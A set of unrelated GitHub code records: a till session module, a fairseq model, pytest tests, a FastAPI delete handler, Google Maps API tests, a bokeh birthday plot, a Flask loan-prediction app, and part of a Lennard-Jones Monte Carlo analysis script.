l.append(tf(\"Total:\", tillconfig.fc(ttt),\n tillconfig.fc(att) if att else \"\"))\n if att and att != ttt:\n l.append(\" ({} by {})\".format(\n \"UP\" if att > ttt else \"DOWN\",\n tillconfig.fc(abs(att - ttt))))\n l.append(\"\")\n dt = zero\n df = ui.tableformatter(\" r l pr \")\n for dept, total in depts:\n l.append(df(\n dept.id, dept.description, tillconfig.fc(total)))\n dt = dt + total\n l.append(ui.tableformatter(\" l pr \")(\"Total\", tillconfig.fc(dt)))\n l.append(\"\")\n l.append(\" Press Print for a hard copy \")\n keymap = {\n keyboard.K_PRINT: (printer.print_sessiontotals, (s.id,), False),\n }\n ui.listpopup(l,\n title=f\"Session number {s.id}\",\n colour=ui.colour_info, keymap=keymap,\n dismiss=keyboard.K_CASH, show_cursor=False)\n\n\n@user.permission_required(\n \"session-summary\", \"Display a summary for any session\")\ndef summary(maxlen=100):\n log.info(\"Session summary popup\")\n m = sessionlist(totalpopup, maxlen=maxlen)\n if len(m) == maxlen:\n m.append((\"Show all\", summary, (None,)))\n ui.menu(m, title=\"Session Summary\", blurb=\"Select a session and \"\n \"press Cash/Enter to view the summary.\",\n dismiss_on_select=False)\n\n\n@user.permission_required('current-session-summary', \"Display a takings \"\n \"summary for the current session\")\ndef currentsummary():\n s = Session.current(td.s)\n if s is None:\n msg = [\"There is no session in progress.\", \"\"]\n # Show details of deferred transactions instead.\n deferred_total = td.s.query(func.sum(Transaction.total))\\\n .filter(Transaction.session == None)\\\n .scalar()\n if deferred_total:\n msg.append(\"There are deferred transactions totalling {}.\".format(\n tillconfig.fc(deferred_total)))\n else:\n msg.append(\"There are no deferred transactions.\")\n ui.infopopup(msg,\n title=\"No current session\",\n colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n return\n log.info(\"Totals popup for session %d (current)\", s.id)\n\n # list of (Dept, total, paid, pending) keyed tuples\n depts = s.dept_totals_closed\n paytotals = dict(s.payment_totals)\n l = []\n l.append(f\" Accounting date {s.date} \")\n l.append(f\" Started {s.starttime:%Y-%m-%d %H:%M:%S} \")\n l.append(\"\")\n tf = ui.tableformatter(\" l rp\")\n for pt in td.s.query(PayType)\\\n .order_by(PayType.order, PayType.paytype)\\\n .all():\n if pt in paytotals:\n l.append(tf(pt.description + \":\", tillconfig.fc(paytotals[pt])))\n l.append(\"\")\n paid_total = zero\n pending_total = zero\n total_total = zero\n df = ui.tableformatter(\" r l p r r r \")\n l.append(df(\n \"\", \"Department\", \"Paid\", \"Pending\", \"Total\"))\n for x in depts:\n if x.paid or x.pending:\n l.append(df(\n x.Department.id, x.Department.description,\n tillconfig.fc(x.paid) if x.paid else \"\",\n tillconfig.fc(x.pending) if x.pending else \"\",\n tillconfig.fc(x.total or zero)))\n paid_total += x.paid or zero\n pending_total += x.pending or zero\n total_total += x.total or zero\n l.append(df(\n \"\", \"Total:\", tillconfig.fc(paid_total), tillconfig.fc(pending_total),\n tillconfig.fc(total_total)))\n l.append(\"\")\n ui.listpopup(l,\n title=f\"Session number {s.id}\",\n colour=ui.colour_info,\n dismiss=keyboard.K_CASH, show_cursor=False)\n\n\n@user.permission_required(\n 'restore-deferred', 'Restore deferred transactions to the current session')\ndef restore_deferred():\n log.info(\"Restore deferred transactions\")\n user.log(\"Restored deferred transactions\")\n deferred = trans_restore()\n if deferred:\n ui.infopopup([\"The following deferred transactions were restored \"\n \"to this session:\", \"\"] + [\n f\"{d.id} — {d.notes}\" if d.notes else\n f\"{d.id}\" for d in deferred],\n title=\"Deferred transactions restored\",\n colour=ui.colour_confirm, dismiss=keyboard.K_CASH)\n else:\n ui.infopopup([\"There were no deferred transactions to be restored.\"],\n title=\"No transactions restored\", colour=ui.colour_confirm,\n dismiss=keyboard.K_CASH)\n\n\nclass SessionHooks(metaclass=InstancePluginMount):\n \"\"\"Hooks for sessions\n\n Accounting integration plugins should subclass this. Subclass\n instances will be called in order of creation. Calls will stop if\n an instance indicates that the action should not be taken.\n \"\"\"\n def preRecordSessionTakings(self, sessionid):\n \"\"\"Called before the Record Session Takings popup appears\n\n To prevent the popup from appearing, return True. You may pop\n up your own information box in this case.\n \"\"\"\n pass\n\n def postRecordSessionTakings(self, sessionid):\n \"\"\"Called after the Record Session Takings popup is completed.\n\n The session takings will have been flushed to the database,\n but the transaction will not yet have been committed. Some\n payment methods may have confirmed the session takings with\n external services.\n \"\"\"\n pass\n\n def preUpdateSessionTakings(self, sessionid):\n \"\"\"Called before the Update Session Takings popup appears\n\n To prevent the popup from appearing, return True. You may pop\n up your own information box in this case.\n \"\"\"\n pass\n\n def fetchReconciledSessionTakings(self, sessionid):\n \"\"\"Called during setup of the Update Session Takings popup\n\n The accounting system can provide a list of payment types that\n are already reconciled for this session and which must not be\n changed.\n \"\"\"\n return []\n\n def postUpdateSessionTakings(self, sessionid):\n \"\"\"Called after the Update Session Takings popup is finished\n\n The session takings will have been flushed to the database,\n but the transaction will not yet have been committed. Some\n payment methods may have confirmed the session takings with\n external services.\n \"\"\"\n pass\n\n\ndef menu():\n \"\"\"Session management menu.\"\"\"\n log.info(\"Session management menu\")\n menu = [\n (\"1\", \"Start a session\", start, None),\n (\"2\", \"End the current session\", end, None),\n (\"3\", \"Record session takings\", recordtakings, None),\n (\"4\", \"Display session summary\", summary, None),\n (\"5\", \"Restore deferred transactions\", restore_deferred, None),\n ]\n ui.keymenu(menu, title=\"Session management options\")\n","repo_name":"sde1000/quicktill","sub_path":"quicktill/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":26009,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"}
+{"seq_id":"31726768125","text":"\"\"\"Convolutional Transformer\"\"\"\n\nfrom fairseq.models import (\n register_model,\n register_model_architecture,\n)\nfrom fairseq.models.transformer import (\n TransformerModel,\n TransformerEncoder,\n base_architecture\n)\n\nfrom fairseq.modules.checkpoint_activations import checkpoint_wrapper\n\nfrom .convtransformer_layer import ConvTransformerEncoderLayer\n\n\n@register_model('convtransformer')\nclass ConvTransformerModel(TransformerModel):\n \"\"\"\n Args:\n encoder (ConvTransformerEncoder): the encoder\n decoder (TransformerDecoder): the decoder\n\n The Transformer model provides the following named architectures and\n command-line arguments:\n\n .. argparse::\n :ref: fairseq.models.transformer_parser\n :prog:\n \"\"\"\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add model-specific arguments to the parser.\"\"\"\n # fmt: off\n super(ConvTransformerModel, ConvTransformerModel).add_args(parser)\n parser.add_argument('--context_size', type=int, default=3,\n help='sets context size for convolutional layers')\n\n @classmethod\n def build_encoder(cls, args, src_dict, embed_tokens):\n return ConvTransformerEncoder(args, src_dict, embed_tokens)\n\n\nclass ConvTransformerEncoder(TransformerEncoder):\n \"\"\"\n ConvTransformer encoder consisting of *args.encoder_layers* layers. Each layer\n is a :class:`ConvTransformerEncoderLayer`.\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n dictionary (~fairseq.data.Dictionary): encoding dictionary\n embed_tokens (torch.nn.Embedding): input embedding\n \"\"\"\n\n def build_encoder_layer(self, args):\n layer = ConvTransformerEncoderLayer(args)\n if getattr(args, \"checkpoint_activations\", False):\n layer = checkpoint_wrapper(layer)\n return layer\n\n\n@register_model_architecture(\"convtransformer\", \"convtransformer\")\ndef convtransformer(args):\n base_architecture(args)\n args.context_size = getattr(args, \"context_size\", 3)\n","repo_name":"quentin-burthier/MT_UGC","sub_path":"convtransformer/convtransformer_model.py","file_name":"convtransformer_model.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17007090873","text":"import numpy as np\nimport pytest\n\nfrom cherab.inversion.derivative import compute_dmat\n\n# valid cases\nCASES = [\n {\n \"vmap\": np.arange(6).reshape(2, 3),\n \"kernel_type\": \"x\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [-1, 1, 0, 0, 0, 0],\n [0, -1, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, -1, 1, 0],\n [0, 0, 0, 0, -1, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(2, 3),\n \"kernel_type\": \"z\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [-1, 1, 0, 0, 0, 0],\n [0, -1, 1, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, -1, 1, 0],\n [0, 0, 0, 0, -1, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 2),\n \"kernel_type\": \"y\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [-1, 0, 1, 0, 0, 0],\n [0, -1, 0, 1, 0, 0],\n [0, 0, -1, 0, 1, 0],\n [0, 0, 0, -1, 0, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 2),\n \"kernel_type\": \"r\",\n \"expected\": np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [-1, 0, 1, 0, 0, 0],\n [0, -1, 0, 1, 0, 0],\n [0, 0, -1, 0, 1, 0],\n [0, 0, 0, -1, 0, 1],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(2, 1, 3),\n \"kernel_type\": \"laplacian4\",\n \"expected\": np.array(\n [\n [-4, 1, 0, 1, 0, 0],\n [1, -4, 1, 0, 1, 0],\n [0, 1, -4, 0, 0, 1],\n [1, 0, 0, -4, 1, 0],\n [0, 1, 0, 1, -4, 1],\n [0, 0, 1, 0, 1, -4],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 1, 2),\n \"kernel_type\": \"laplacian8\",\n \"expected\": np.array(\n [\n [-8, 1, 1, 1, 0, 0],\n [1, -8, 1, 1, 0, 0],\n [1, 1, -8, 1, 1, 1],\n [1, 1, 1, -8, 1, 1],\n [0, 0, 1, 1, -8, 1],\n [0, 0, 1, 1, 1, -8],\n ]\n ),\n },\n {\n \"vmap\": np.arange(6).reshape(3, 1, 2),\n \"kernel_type\": \"custom\",\n \"kernel\": np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]]),\n \"expected\": np.array(\n [\n [-4, 1, 1, 0, 0, 0],\n [1, -4, 0, 1, 0, 0],\n [1, 0, -4, 1, 1, 0],\n [0, 1, 1, -4, 0, 1],\n [0, 0, 1, 0, -4, 1],\n [0, 0, 0, 1, 1, -4],\n ]\n ),\n },\n]\n\n# invalid cases\nINVALID_CASES = [\n {\n \"vmap\": np.zeros((2, 2, 2)), # invalid shape\n \"kernel_type\": \"x\",\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((4, 3)),\n \"kernel_type\": \"_\", # invalid kernel type\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((3, 5)),\n \"kernel_type\": \"custom\",\n \"kernel\": np.zeros((2, 2, 2)), # invalid kernel dimension\n \"error\": ValueError,\n },\n {\n \"vmap\": np.zeros((5, 5)),\n \"kernel_type\": \"custom\",\n \"kernel\": np.zeros((2, 2)), # invalid kernel shape\n \"error\": ValueError,\n },\n]\n\n\ndef test_compute_dmat():\n # valid tests\n for case in CASES:\n vmap = case[\"vmap\"]\n kernel_type = case[\"kernel_type\"]\n if kernel_type == \"custom\":\n kernel = case[\"kernel\"]\n dmat = compute_dmat(vmap, kernel_type=kernel_type, kernel=kernel)\n else:\n dmat = compute_dmat(vmap, kernel_type=kernel_type, kernel=None)\n assert np.allclose(dmat.A, case[\"expected\"])\n\n # invalid tests\n for case in INVALID_CASES:\n vmap = case[\"vmap\"]\n kernel_type = case[\"kernel_type\"]\n if kernel_type == \"custom\":\n kernel = case[\"kernel\"]\n with pytest.raises(case[\"error\"]):\n compute_dmat(vmap, kernel_type=kernel_type, kernel=kernel)\n else:\n with pytest.raises(case[\"error\"]):\n compute_dmat(vmap, kernel_type=kernel_type, kernel=None)\n\n\nif __name__ == \"__main__\":\n test_compute_dmat()\n","repo_name":"munechika-koyo/cherab_inversion","sub_path":"cherab/inversion/tests/test_derivative.py","file_name":"test_derivative.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11961065135","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import sessionmaker\nfrom db.connection import engine\nfrom db.models import Account_book\nfrom datetime import datetime\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef delete_account_book(user_id, no=None):\n try:\n if no:\n data = session.query(Account_book).filter_by(no=no, user_id=user_id, status=True).first()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(no=no, user_id=user_id, status=True). \\\n update({\"status\": False, \"create_time\": datetime.now()})\n session.commit()\n result = JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"데이터 삭제 완료.\"})\n\n else:\n data = session.query(Account_book).filter_by(user_id=user_id, status=True).all()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(user_id=user_id, status=True). \\\n update({\"status\": False, \"create_time\": datetime.now()})\n session.commit()\n result = JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"모든 데이터가 삭제 완료.\"})\n\n return result\n\n except HTTPException as err:\n raise err\n\n except Exception as err:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(err))\n\n finally:\n session.close()\n","repo_name":"kimhyongkui/account_book","sub_path":"db/delete/account_book.py","file_name":"account_book.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71512499394","text":"\"\"\" test_googleMapsApi\n * all basic-tests for Google-Maps-API are implemented here\n author: inf20086@lehre.dhbw-stuttgart.de\n date: 22.03.2023\n version: 0.0.1\n license: MIT\n\"\"\"\n\nfrom unittest import TestCase\nfrom morning.googleMapsApi import GoogleMapsApi\nfrom datetime import datetime, timedelta\nimport json, os\n\nGMA = GoogleMapsApi()\n\n\nclass TestGoogleMapsApi(TestCase):\n\n def test_parameterValid(self):\n string_correct = \"url&mode=transit&arrival_time=1704021753&origins=origin&destinations=dest\"\n datetime_str = '12/31/23 11:22:33'\n datetime_object = datetime.strptime(datetime_str, '%m/%d/%y %H:%M:%S')\n\n string_to_test = GMA.parameter_valid(\"transit\", \"origin\", \"dest\", datetime_object, \"url\")\n\n self.assertEqual(string_correct, string_to_test)\n\n def test_travelModeValid(self):\n self.assertEqual(True, GMA.travel_mode_valid(\"walking\"))\n\n def test_originIsString(self):\n self.assertEqual(True, GMA.origin_is_string(\"iFartInYourGeneralDirection\"))\n\n def test_destinationIsString(self):\n self.assertEqual(True, GMA.destination_is_string(\"tisButAScratch\"))\n\n def test_getDuration(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = \"1 hour 56 minutes\"\n self.assertEqual(correct_string, GMA.get_duration(data))\n\n def test_getDistance(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = \"69.1 kilometer\"\n self.assertEqual(correct_string, GMA.get_distance(data))\n\n def test_getDurationValue(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = 6969\n self.assertEqual(correct_string, GMA.get_duration_value(data))\n\n def test_getDistanceValue(self):\n f = open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'testResponse.json'), \"r\", encoding='utf8')\n data = json.load(f)\n f.close()\n correct_string = 42069\n self.assertEqual(correct_string, GMA.get_distance_value(data))\n\n def test_googleMapsApiRequest(self):\n correct_string = ('33.0 kilometer', '1 hour 30 minutes')\n tom_date = datetime.now() + timedelta(1)\n tom_day = tom_date.day\n tom_month = tom_date.month\n tom_year = tom_date.year\n\n self.assertEqual(correct_string, GMA.google_maps_api_request(\"Filderstadt\", \"Stuttgart\", 'transit',\n arrival_time=datetime(tom_year, tom_month, tom_day,\n 3)))\n","repo_name":"PrimitiveEngineering/DigAs","sub_path":"test/morning_tests/test_googleMapsApi.py","file_name":"test_googleMapsApi.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37455074765","text":"# Exercises 33, 34, 35 and 36\n\n# For this exercise, we will keep track of when our friend’s birthdays are, and \n# be able to find that information based on their name. Create a dictionary (in your file) \n# of names and birthdays. When you run your program it should ask the user to enter a name, \n# and return the birthday of that person back to them.\n\n# In the previous exercise we saved information about famous scientists’ names and birthdays to disk. \n# In this exercise, load that JSON file from disk, extract the months of all the birthdays, \n# and count how many scientists have a birthday in each month.\n\n# Load the JSON file from disk, extract the months of all the birthdays, \n# and count how many scientists have a birthday in each month.\n\n# In this exercise, use the bokeh Python library to plot a histogram of which months the scientists \n# have birthdays in! Because it would take a long time for you to input the months of various scientists, \n# you can use my scientist birthday JSON file. Just parse out the months \n# (if you don’t know how, I suggest looking at the previous exercise or its solution) and draw your histogram.\n\nbirthdays = {\n \"Fede\": \"09/12/1990\", \n \"Juli\": \"02/27/1993\", \n \"Patri\": \"06/03/1962\"\n}\nimport bokeh.plotting\nimport json\nfrom collections import Counter\n\nnum_to_string = {\n\t1: \"January\",\n\t2: \"February\",\n\t3: \"March\", \n\t4: \"April\",\n\t5: \"May\",\n\t6: \"June\",\n\t7: \"July\",\n\t8: \"August\",\n\t9: \"September\",\n\t10: \"October\",\n\t11: \"November\",\n\t12: \"December\"\n}\n\nwith open(\"birthdays.json\", \"r\") as f:\n birthdays = json.load(f)\n\n\nprint(\"Welcome to the birthday dictionary. We know the birthdays of:\")\nfor name in birthdays:\n print(name)\n\nnewName = input(\"New person's name: \")\n\nif newName not in birthdays.keys():\n newBirthday = input(\"New person's birthday: \")\n birthdays[newName] = newBirthday\nelse:\n print(\"That person's birthday was already added.\")\n\n# print(birthdays)\n\nmonths = []\nfor name, birthday_string in birthdays.items():\n month = int(birthday_string.split(\"/\")[0])\n months.append(num_to_string[month])\n\nmonths = Counter(months)\n# print(months)\n\nwith open('birthdays.json', 'w') as f:\n json.dump(birthdays, f)\nprint('{} was added to the birthday list\\n'.format(newName))\n\nmonths_name = list(months.keys())\nmonths_quantity = list(months.values())\n\nbokeh.plotting.output_file('plot.html')\nplot = bokeh.plotting.figure(x_range=list(num_to_string.values()))\nplot.vbar(x=months_name, top=months_quantity, width=0.7)\nbokeh.plotting.show(plot)\n\nname = input(\"Who's birthday do you want to look up?: \")\nif name in birthdays:\n print('{}\\'s birthday is {}.'.format(name, birthdays[name]))\nelse:\n print('Sadly, we don\\'t have {}\\'s birthday.'.format(name))\n\n","repo_name":"fhenseler/practicepython","sub_path":"33-34-35-36.py","file_name":"33-34-35-36.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34347594703","text":"from flask import Flask, request, render_template\nfrom markupsafe import escape\nimport pickle\nimport numpy as np\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n model = pickle.load(open('model.pkl', 'rb'))\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n img_url =\"https://plus.unsplash.com/premium_photo-1679856789519-790899bcaa09?q=80&w=1374&auto=format&fit=crop&ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D\"\n\n return render_template(\"index.html\",img_url=img_url)\n\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n gender = request.form['gender']\n married = request.form['married']\n dependents = request.form['dependents']\n education = request.form['education']\n employed = request.form['employed']\n credit = float(request.form['credit'])\n area = request.form['area']\n ApplicantIncome = float(request.form['ApplicantIncome'])\n CoapplicantIncome = float(request.form['CoapplicantIncome'])\n LoanAmount = float(request.form['LoanAmount'])\n Loan_Amount_Term = float(request.form['Loan_Amount_Term'])\n\n # gender\n if (gender == \"Male\"):\n male=1\n else:\n male=0\n \n # married\n if(married==\"Yes\"):\n married_yes = 1\n else:\n married_yes=0\n\n # dependents\n if(dependents=='1'):\n dependents_1 = 1\n dependents_2 = 0\n dependents_3 = 0\n elif(dependents == '2'):\n dependents_1 = 0\n dependents_2 = 1\n dependents_3 = 0\n elif(dependents==\"3+\"):\n dependents_1 = 0\n dependents_2 = 0\n dependents_3 = 1\n else:\n dependents_1 = 0\n dependents_2 = 0\n dependents_3 = 0 \n\n # education\n if (education==\"Not Graduate\"):\n not_graduate=1\n else:\n not_graduate=0\n\n # employed\n if (employed == \"Yes\"):\n employed_yes=1\n else:\n employed_yes=0\n\n # property area\n\n if(area==\"Semiurban\"):\n semiurban=1\n urban=0\n elif(area==\"Urban\"):\n semiurban=0\n urban=1\n else:\n semiurban=0\n urban=0\n\n\n ApplicantIncomelog = np.log(ApplicantIncome)\n totalincomelog = np.log(ApplicantIncome+CoapplicantIncome)\n LoanAmountlog = np.log(LoanAmount)\n Loan_Amount_Termlog = np.log(Loan_Amount_Term)\n\n prediction = model.predict([[credit, ApplicantIncomelog,LoanAmountlog, Loan_Amount_Termlog, totalincomelog, male, married_yes, dependents_1, dependents_2, dependents_3, not_graduate, employed_yes,semiurban, urban ]])\n\n # print(prediction)\n\n if(prediction==\"N\"):\n prediction=\"Not Approved\"\n else:\n prediction=\"Approved\"\n\n\n return render_template(\"prediction.html\", prediction_text=\"---->Your Loan Status is {}\".format(prediction))\n\n\n\n\n else:\n return render_template(\"prediction.html\")\n\n\n\n@app.route('/aboutus')\ndef aboutus():\n img_url =\"https://drive.google.com/uc?id=1NvB5xttWt0-j_dzXh8DiVTx3Ja7Pz7Y_\"\n return render_template(\"aboutus.html\", img_url=img_url)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"nishanttG/LoanPredict","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23416984271","text":"input = [x.strip() for x in open('A-small-attempt0.in', 'r')]\r\noutput = open('output.txt', 'w')\r\n\r\ncase_num = int(input[0])\r\n\r\nfor i in range(case_num):\r\n answer1 = int(input[i * 10 + 1])\r\n cards1 = [int(x) for x in input[i * 10 + 1 + answer1].split(' ')]\r\n answer2 = int(input[i * 10 + 6])\r\n cards2 = [int(x) for x in input[i * 10 + 6 + answer2].split(' ')]\r\n possible_cards = [x for x in cards1 if x in cards2]\r\n possibilities = len(possible_cards)\r\n \r\n output.write(\"Case #%s: \" % (i + 1))\r\n \r\n if possibilities == 1:\r\n output.write(\"%s\" % possible_cards[0])\r\n elif possibilities > 1:\r\n output.write('Bad magician!')\r\n else:\r\n output.write('Volunteer cheated!')\r\n \r\n output.write(\"\\n\")\r\n\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3514.py","file_name":"3514.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14738678308","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\n\"\"\"Read the file with the Metropolis Kob-Anderson LJ Binary \nMixture Data using the Canonical Ensemble sampling method.\"\"\"\nf = open('Metropolis_Large_MC_FCC_50000_RDF_5000_rho_1.2_delta_0.1_T_1.out', 'r')\n\n# read in the contents\ncontents = f.readlines()\n\n# baseline sigma value\nsigma = contents[1]\nsigma = float(sigma)\n\n# sigma_aa value (distance between a-a spheres)\nsigma_aa = contents[3]\nsigma_aa = float(sigma_aa)\n\n# sigma_bb value (distance between b-b spheres)\nsigma_bb = contents[5]\nsigma_bb = float(sigma_bb)\n\n# sigma_ab value (distance between a-b spheres)\nsigma_ab = contents[7]\nsigma_ab = float(sigma_ab)\n\n# read in temperature of system\nT = contents[9]\nT = float(T)\n\n# read in baseline energy constant epsilon\nepsilon = contents[11]\nepsilon = float(epsilon)\n\n# epsilon_aa (energy constant between a-a spheres)\nepsilon_aa = contents[13]\nepsilon_aa = float(epsilon_aa)\n\n# epsilon_bb (energy constant between b-b spheres)\nepsilon_bb = contents[15]\nepsilon_bb = float(epsilon_bb)\n\n# epsilon_ab (energy constant between a-b spheres)\nepsilon_ab = contents[17]\nepsilon_ab = float(epsilon_ab)\n\n# reduced density parameter of system, rho\nrho = contents[19]\nrho = float(rho)\nrho = round(rho, 3)\n\n# total number of spheres\nn_total = contents[21]\nn_total = int(n_total)\n\n# fraction of a-type spheres (should be about 80%)\nx_a = contents[23]\nx_a = float(x_a)\n\n# fraction of b-type spheres (should be about 20%)\nx_b = contents[25]\nx_b = float(x_b)\nx_b = round(x_b, 2)\n\n# packing fraction phi\nphi = contents[27]\nphi = float(phi)\n\n# distance of the positive side of the uniform distribution\ndelta = contents[29]\ndelta = float(delta)\n\n# total number of MC steps taken in the simulation\nMC_steps = contents[31]\nMC_steps = int(MC_steps)\n\n\"\"\"Total number of RDF values averaged at the end w/out \nrelaxation time (i.e. for 50,000 MC steps and skipping\naverages for 10 MC steps, the number of RDFs averaged will\nbe 5,000 for the final averaged RDF.)\"\"\"\nRDF_ideal = contents[33]\nRDF_ideal = int(RDF_ideal)\n\n# define this value to simplify reading lines\nskip = RDF_ideal\n\n# relazation time if one is given before-hand (this is usually 0)\nt_relax = contents[35]\nt_relax = int(t_relax)\n\n\"\"\"Read in spheres list (this labels the particles with sphere\ntypes a and b, where a value of 1 represents an a-type and a\nvalue of 0 represents a b-type).\"\"\" \nspheres = []\nsphere_list = contents[3*n_total+40:4*n_total+40]\n\nfor line in sphere_list:\n\tspheres.append(int(line))\n\n# total a and b sphere numbers\nA_spheres = contents[4*n_total+40]\nspheres_a = contents[4*n_total+41]\nspheres_a = float(spheres_a)\nB_spheres = contents[4*n_total+42]\nspheres_b = contents[4*n_total+43]\nspheres_b = float(spheres_b)\n\n# moves accepted\naccept_statement = contents[(7+3*skip)*n_total+(47+3*skip)]\naccept = contents[(7+3*skip)*n_total+(48+3*skip)]\naccept = int(accept)\n\n# moves rejected\nreject_statement = contents[(7+3*skip)*n_total+(49+3*skip)]\nreject = contents[(7+3*skip)*n_total+(50+3*skip)]\nreject = int(reject)\n\n# Acceptance percentage\nper_accept_statement = contents[(7+3*skip)*n_total+(51+3*skip)]\nper_accept_met = contents[(7+3*skip)*n_total+(52+3*skip)]\nper_accept_met = float(per_accept_met)\nper_accept_met = np.round(per_accept_met, 1)\n\n# Exact RDF numbers (if the RDF_number = RDF_ideal, then the\n# difference is zero)\nRDF_statement = contents[(7+3*skip)*n_total+(53+3*skip)]\nRDF_number = contents[(7+3*skip)*n_total+(54+3*skip)]\nRDF_number = int(RDF_number)\nRDF_difference = RDF_ideal - RDF_number\n\n# number of bins used in the RDF histogram (usually 300)\nNbins_statement = contents[(7+3*skip)*n_total+(55+3*skip)]\nNbins = contents[(7+3*skip)*n_total+(56+3*skip)]\nNbins = int(Nbins)\n\n# extract energies from canonical ensemble sampling simulation\nenergies_met = []\nenergy = contents[(7+3*skip)*n_total+4*Nbins+(62+3*skip):(7+3*skip)*n_total+4*Nbins+(62+3*skip)+RDF_number]\n\nfor line in energy:\n\tenergies_met.append(float(line))\n\nf.close()\n\n# define array of MC steps taken in simulation\niterations_met = np.linspace(RDF_difference+0,RDF_ideal+0-1,RDF_number)\niterations_met = np.array(iterations_met)\n\n\"\"\"Define landscape energy from Kob-Andersen curve of best fit.\nThis is E_L = 2.639*T^0.6 - 8.656. This is the same value used\nin both the canonical and PEL ensembles for comparisons of the\nsame temperature/energy values.\"\"\"\nenergy_land = -8.656 + 2.639*T**0.6\nenergy_land = np.round(energy_land, 3)\nlandscape_energy = np.zeros(RDF_number)\nfor i in range(0,RDF_number):\n landscape_energy[i] = energy_land\n\n# define total average energies as an array\nenergies_met = np.array(energies_met)\nenergies_ave_met = energies_met/n_total\n\n# calculate cumulative average energies\nenergies_cumul_met = np.zeros(RDF_number)\nenergies_cumul_ave_met = np.zeros(RDF_number)\nfor i in range(RDF_number):\n\tfor j in range(i+1):\n\t\tenergies_cumul_met[i] += energies_ave_met[j]\n\n# final cumulative average energies\nfor i in range(RDF_number):\n\tenergies_cumul_ave_met[i] = energies_cumul_met[i]/(i+1)\n\nf = open('Cumulative_Energies_Canonical_T_1.out', 'w')\n\nf.write('Cumulative Canonical Ensemble Energies at T*=1\\n')\nfor val in energies_cumul_ave_met:\n f.write(\"{:}\\n\".format(val))\n\nf.close()\n\n# calculate the average energy of the average energies and \n# the standard deviation of the average energies\ntotal_energy = 0\nenergy_diff = 0\nfor i in range(0,RDF_ideal):\n total_energy += energies_met[i]\nmean_energy_met = total_energy/(n_total*RDF_ideal)\nmean_energy_met = round(mean_energy_met, 3)\nfor i in range(0,RDF_ideal):\n energy_diff += (energies_ave_met[i] - mean_energy_met)**2\nstand_dev = np.sqrt(energy_diff/((RDF_ideal-1)*RDF_ideal))\nstand_dev = round(stand_dev, 3)\nmean_energies_met = np.zeros(RDF_ideal)\nfor i in range(0,RDF_ideal):\n 